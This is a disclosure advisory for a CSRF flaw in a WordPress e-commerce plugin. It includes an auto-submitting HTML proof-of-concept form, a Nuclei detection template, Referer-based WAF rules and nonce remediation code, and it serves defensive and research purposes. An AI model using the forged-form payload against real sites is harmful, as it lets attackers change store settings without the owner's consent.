Keywords: CVE-2026-1208, Friendly Functions for Welcart vulnerability, CSRF, Cross-Site Request Forgery, WordPress security, WordPress plugin vulnerability, CWE-352, Welcart security, settings manipulation, WordPress CVE 2026
- Overview
- Vulnerability Details
- Technical Analysis
- Attack Vector
- Proof of Concept
- Remediation Guide
- CVSS Metrics
- References
- Security Contact
# Friendly Functions for Welcart WordPress Plugin CSRF Vulnerability (CVE-2026-1208)

Security flaw allowing unauthenticated attackers to modify plugin settings via forged requests.
## Overview

A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the Friendly Functions for Welcart plugin that allows unauthenticated attackers to update plugin settings by tricking an administrator into clicking a malicious link.

- Discovered by: Kai Aizen (SnailSploit)
- Published: January 23, 2026
- CVSS Score: 4.3 (Medium)
- CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
- Plugin: Friendly Functions for Welcart
- Attack Type: Cross-Site Request Forgery to Settings Update
- Required Privileges: None (Unauthenticated Attack + Social Engineering)
## Vulnerability Details

The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the settings page. This makes it possible for unauthenticated attackers to update plugin settings via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

This vulnerability allows unauthenticated attackers to:

- Modify plugin settings without authorization
- Manipulate Welcart e-commerce functionality
- Potentially disrupt store operations
- Chain with other vulnerabilities for escalated attacks

Affected Versions:

- Vulnerable: All versions ≤ 1.2.5
- Patched: Version 1.2.6 and above
## CVSS Metrics

`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N`

| Metric | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | Required (UI:R) |
| Scope | Unchanged (S:U) |
| Confidentiality | None (C:N) |
| Integrity | Low (I:L) |
| Availability | None (A:N) |
## Technical Analysis

The vulnerability exists in the settings page implementation where:

- The plugin settings form lacks proper nonce validation
- Settings update requests are processed without verifying request origin
- No CSRF tokens are generated or validated
- Administrative actions can be performed via cross-origin requests

The vulnerability was identified in the following locations:

- `ffw_function_settings.php` - Line 53
- `ffw_function_settings.php` - Line 58
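To make concrete what the missing nonce check would have enforced, the following is an added Python model of how a WordPress-style nonce binds a request to a user, a session and an action inside a time window. It is illustrative code written for this page, not the plugin's or WordPress core's code: it is modelled on the structure core uses (tick, action, user id and session token under a keyed hash, ten characters kept), but the salt, user id and session token are constructed values and `process_settings_update` is a hypothetical stand-in for the plugin's settings save routine, with the checks the Remediation Guide's PHP snippet asks for.

```python
import hashlib
import hmac
import math

NONCE_LIFE = 24 * 60 * 60  # WordPress default nonce lifetime: one day, split into two 12-hour ticks
NONCE_SALT = b"constructed-salt-for-illustration"  # stands in for the site's secret nonce salt


def nonce_tick(now: int, life: int = NONCE_LIFE) -> int:
    """Time window index; a nonce is accepted in the tick it was minted and the following one."""
    return math.ceil(now / (life / 2))


def _nonce_for_tick(tick: int, action: str, user_id: int, session_token: str, salt: bytes) -> str:
    # The keyed hash covers tick, action, user and session token, so a value minted for one
    # admin session cannot be produced by a page that does not hold that session's token.
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    digest = hmac.new(salt, msg, hashlib.md5).hexdigest()
    return digest[-12:-2]  # ten hex characters, mirroring substr($hash, -12, 10)


def create_nonce(action: str, user_id: int, session_token: str, now: int, salt: bytes = NONCE_SALT) -> str:
    return _nonce_for_tick(nonce_tick(now), action, user_id, session_token, salt)


def verify_nonce(nonce, action: str, user_id: int, session_token: str, now: int, salt: bytes = NONCE_SALT):
    """Return 1 if the nonce is from the current tick, 2 if from the previous tick, else False."""
    tick = nonce_tick(now)
    for result, t in ((1, tick), (2, tick - 1)):
        expected = _nonce_for_tick(t, action, user_id, session_token, salt)
        if hmac.compare_digest(expected, str(nonce)):
            return result
    return False


def process_settings_update(post: dict, user_id: int, session_token: str, user_caps: set, now: int) -> str:
    """Hypothetical settings handler with the two checks the fix requires.
    Returns 'saved', 'bad_nonce' or 'forbidden'."""
    nonce = post.get("ffw_settings_nonce")
    if not nonce or not verify_nonce(nonce, "ffw_settings_update", user_id, session_token, now):
        return "bad_nonce"  # a form served from another origin cannot supply this value
    if "manage_options" not in user_caps:
        return "forbidden"
    return "saved"


# Constructed demo: the admin's own form carries a valid nonce; the forged form from the
# Proof of Concept section submits only the setting field and no nonce.
ADMIN_ID, ADMIN_SESSION, ADMIN_CAPS = 1, "constructed-session-token", {"manage_options"}
NOW = 1_000_000


def demo():
    legit = {"ffw_setting_option": "value",
             "ffw_settings_nonce": create_nonce("ffw_settings_update", ADMIN_ID, ADMIN_SESSION, NOW)}
    forged = {"ffw_setting_option": "malicious_value"}
    return (process_settings_update(legit, ADMIN_ID, ADMIN_SESSION, ADMIN_CAPS, NOW),
            process_settings_update(forged, ADMIN_ID, ADMIN_SESSION, ADMIN_CAPS, NOW))


if __name__ == "__main__":
    print(demo())  # ('saved', 'bad_nonce')
```

The point of the model is the two-tick window and the session token in the hash: a nonce expires on its own, is useless under a different action name, and cannot be computed by anyone who lacks the administrator's session token, which is exactly what the vulnerable settings page never asked for.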
## Attack Vector

The attack requires social engineering to trick an authenticated administrator into visiting a malicious page or clicking a crafted link while logged into their WordPress site.

- Target: WordPress Admin with Friendly Functions for Welcart installed
- Method: Malicious HTML page with auto-submitting form
- Trigger: Administrator clicks link or visits attacker-controlled page
## Proof of Concept

```html
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- Add additional setting fields as needed -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>
```
⚠️ Warning: This PoC is provided for educational and authorized testing purposes only.
Reproduction Steps:

- Set up a WordPress instance with Friendly Functions for Welcart <= 1.2.5
- Host the CSRF payload on an attacker-controlled server
- Authenticate as an administrator on the target WordPress site
- Visit the attacker-controlled page (simulating clicking a malicious link)
- Observe that plugin settings are modified without explicit consent
Version Check:

```bash
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"

# Get specific version
wp plugin get friendly-functions-for-welcart --field=version
```

Nuclei Template:
```yaml
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF to Settings Update
  author: SnailSploit
  severity: medium
  description: |
    Friendly Functions for Welcart plugin for WordPress is vulnerable
    to CSRF in versions <= 1.2.5 due to missing nonce validation.
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"

      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"
```

ModSecurity Rule:
```apache
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026002,phase:2,t:none,\
log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"
```

Both rules decide purely on the Referer header and are a stopgap until the plugin is updated: rule 2026001 also denies a legitimate administrator whose browser omits Referer (for example under a strict referrer policy), and neither rule replaces the missing nonce check in the plugin itself. Replace `yourdomain.com` with the site's actual host before deploying.

Nginx Rule:
```nginx
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
    # Initialise the flag so the second "if" never reads an uninitialised variable
    set $csrf_check "";

    # Check for ffw-settings page without proper referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }

    # Pass to PHP handler (php-fpm must be an upstream defined elsewhere in your config)
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}
```

## Remediation Guide

Immediate Action Required:
- Update to Friendly Functions for Welcart version 1.2.6 or later immediately
- Review your site's plugin settings for unauthorized modifications
- If you cannot update immediately, consider temporarily disabling the plugin
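The ModSecurity and Nginx rules above key entirely on the Referer header. The Python below is an added illustration for this page (not the vendor's code and not a WAF engine): it replays the rules' logic against three constructed requests and compares it with a check based on the `Sec-Fetch-Site` and `Origin` headers that browsers attach to form posts. `SITE_HOST` stands in for the `yourdomain.com` placeholder in the rules, and the request dictionaries are constructed, not captured traffic.

```python
from urllib.parse import urlparse

SITE_HOST = "yourdomain.com"  # placeholder for the protected site, as in the WAF rules above


def _same_site(url: str) -> bool:
    """True when the URL's host is SITE_HOST or one of its subdomains (e.g. www.)."""
    host = (urlparse(url).hostname or "").lower()
    return host == SITE_HOST or host.endswith("." + SITE_HOST)


def referer_rules_block(method: str, path: str, query: dict, headers: dict) -> bool:
    """Model of rules 2026001/2026002 and the Nginx location: block admin.php?page=ffw-settings
    when Referer is absent (first rule) or names another host (second rule). Method is ignored,
    as in the rules themselves."""
    if "/wp-admin/admin.php" not in path or query.get("page") != "ffw-settings":
        return False
    referer = headers.get("Referer")
    return referer is None or not _same_site(referer)


def fetch_metadata_blocks(method: str, path: str, query: dict, headers: dict) -> bool:
    """Check for state-changing admin requests that prefers Sec-Fetch-Site, then Origin,
    and falls back to Referer only when the browser sent neither."""
    if method.upper() not in ("POST", "PUT", "PATCH", "DELETE") or "/wp-admin/" not in path:
        return False
    site = headers.get("Sec-Fetch-Site")
    if site is not None:
        return site not in ("same-origin", "same-site")
    origin = headers.get("Origin")
    if origin is not None:
        return not _same_site(origin)  # an "Origin: null" value is also treated as foreign
    referer = headers.get("Referer")
    return referer is None or not _same_site(referer)


# Constructed requests against the vulnerable settings endpoint.
REQUESTS = {
    # The administrator submits the real settings form from inside wp-admin.
    "admin_form": dict(method="POST", path="/wp-admin/admin.php", query={"page": "ffw-settings"},
                       headers={"Referer": "https://yourdomain.com/wp-admin/admin.php?page=ffw-settings",
                                "Origin": "https://yourdomain.com", "Sec-Fetch-Site": "same-origin"}),
    # The auto-submitting form from the Proof of Concept, loaded from an attacker-controlled page.
    "cross_site_form": dict(method="POST", path="/wp-admin/admin.php", query={"page": "ffw-settings"},
                            headers={"Referer": "https://attacker.example/poc.html",
                                     "Origin": "https://attacker.example", "Sec-Fetch-Site": "cross-site"}),
    # The same legitimate form, but the browser omitted Referer (strict referrer policy on the site).
    "admin_form_no_referer": dict(method="POST", path="/wp-admin/admin.php", query={"page": "ffw-settings"},
                                  headers={"Origin": "https://yourdomain.com", "Sec-Fetch-Site": "same-origin"}),
}


def evaluate() -> dict:
    """Map each constructed request to (referer_rules_block, fetch_metadata_blocks)."""
    return {name: (referer_rules_block(**req), fetch_metadata_blocks(**req)) for name, req in REQUESTS.items()}


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name}: referer-rules block={verdict[0]}, fetch-metadata block={verdict[1]}")
```

The third case is the false positive to watch for: the Referer-only rules deny a legitimate administrator whose browser stripped Referer, while the fetch-metadata check still admits the request because `Sec-Fetch-Site` reports same-origin. Either check is a perimeter stopgap; the nonce validation described under the developer guidance below is what actually closes the hole.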
Update Steps:

- Navigate to Plugins > Installed Plugins in WordPress admin
- Locate "Friendly Functions for Welcart"
- Click Update Now to upgrade to version 1.2.6 or later
- Verify the update was successful
- Review and confirm your plugin settings are correct
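As an added way to confirm the "Verify the update was successful" step offline, the Python below (illustrative code written for this page, not the vendor's code or the Nuclei template) parses the `Stable tag` from a plugin readme.txt the way the template's matcher does, but compares the version numerically against the patched release 1.2.6, and accepts a bare version string such as the output of `wp plugin get ... --field=version`. The readme excerpts are constructed samples; they also show where the template's unanchored regex over-matches, since `1.2.10` contains the substring `1.2.1`.

```python
import re

PATCHED = (1, 2, 6)  # first fixed release named in the advisory

# Constructed readme.txt excerpts (not real plugin files), used as offline sample input.
SAMPLE_READMES = {
    "vulnerable": "=== Friendly Functions for Welcart ===\nRequires at least: 5.0\nStable tag: 1.2.5\n",
    "patched":    "=== Friendly Functions for Welcart ===\nStable tag: 1.2.6\n",
    "later":      "=== Friendly Functions for Welcart ===\nStable tag: 1.2.10\n",
    "trunk":      "=== Friendly Functions for Welcart ===\nStable tag: trunk\n",
    "other":      "=== Some Other Plugin ===\nStable tag: 1.0.0\n",
}

STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*([0-9][0-9.]*)\s*$", re.IGNORECASE | re.MULTILINE)

# The advisory's Nuclei regex matcher, unanchored: hits 1.0.x, 1.1.x and 1.2.0 through 1.2.5,
# but also any longer version that merely starts with one of those strings.
NUCLEI_MATCHER_RE = re.compile(r"(?i)Stable tag:\s*(1\.([0-1]\.[0-9]|2\.[0-5]))")


def parse_version(version: str) -> tuple:
    """'1.2.5' -> (1, 2, 5); pads to three components so '1.2' compares like 1.2.0.
    Raises ValueError for non-numeric tags such as 'trunk'."""
    parts = tuple(int(p) for p in version.strip().strip(".").split("."))
    return (parts + (0, 0, 0))[:3]


def classify_version(version: str) -> str:
    """Verdict for a version string, e.g. the output of `wp plugin get ... --field=version`."""
    return "vulnerable" if parse_version(version) < PATCHED else "patched"


def stable_tag(readme_text: str):
    """Numeric Stable tag from a readme.txt body, or None when absent or non-numeric."""
    m = STABLE_TAG_RE.search(readme_text)
    return m.group(1) if m else None


def assess_readme(readme_text: str) -> str:
    """'vulnerable', 'patched', 'unknown' or 'not-ffw' for a readme.txt body."""
    if "Friendly Functions for Welcart" not in readme_text:
        return "not-ffw"
    tag = stable_tag(readme_text)
    return "unknown" if tag is None else classify_version(tag)


def nuclei_matchers_hit(readme_text: str) -> bool:
    """Mirror of the template's word and regex matchers under matchers-condition: and
    (the HTTP 200 status matcher is assumed satisfied for an offline body)."""
    return ("Friendly Functions for Welcart" in readme_text
            and NUCLEI_MATCHER_RE.search(readme_text) is not None)


def compare_all() -> dict:
    """(numeric verdict, template regex hit) per sample; 'later' shows the 1.2.10 over-match."""
    return {name: (assess_readme(text), nuclei_matchers_hit(text)) for name, text in SAMPLE_READMES.items()}


if __name__ == "__main__":
    for name, (verdict, hit) in compare_all().items():
        print(f"{name:10s} numeric={verdict:10s} nuclei_regex_hit={hit}")
```

Run it after updating and feed `assess_readme` the plugin's own readme.txt, or `classify_version` the WP-CLI version string; a numeric comparison is the check to trust, while the regex result is shown only so the over-match on hypothetical later releases such as 1.2.10 is visible.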
Ensure all settings forms implement proper CSRF protection:

```php
<?php
// Example of proper CSRF protection in WordPress

// In your form: emit a nonce field tied to this specific action
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// In your form handler:
function process_settings_update() {
    // Verify nonce (binds the request to this user's session and this action)
    if (!isset($_POST['ffw_settings_nonce']) ||
        !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['ffw_settings_nonce'])), 'ffw_settings_update')) {
        wp_die('Security check failed');
    }

    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }

    // Process settings update (sanitize each submitted value before saving it)
    // ...
}
```

Timeline:

- January 23, 2026 - Vulnerability publicly disclosed
- January 23, 2026 - CVE-2026-1208 assigned
- Version 1.2.6 - Patch released by plugin vendor
## References

- Wordfence Intelligence Database Entry
- WordPress Plugin Trac - Line 53
- WordPress Plugin Trac - Line 58
- Plugin Changeset (Patch)
- MITRE CVE Entry
Researcher:
- Kai Aizen - SnailSploit
Disclosure Process: Coordinated through Wordfence Bug Bounty Program
This information is provided for security research and defensive purposes only. Any exploitation of this vulnerability for malicious purposes is illegal and unethical. Always obtain proper authorization before testing systems you do not own.
## Security Contact

For questions or additional information about this vulnerability:

- Email: kai@owasp.com
- Website: snailsploit.com
- Organization: SnailSploit Security Research
Last updated: January 23, 2026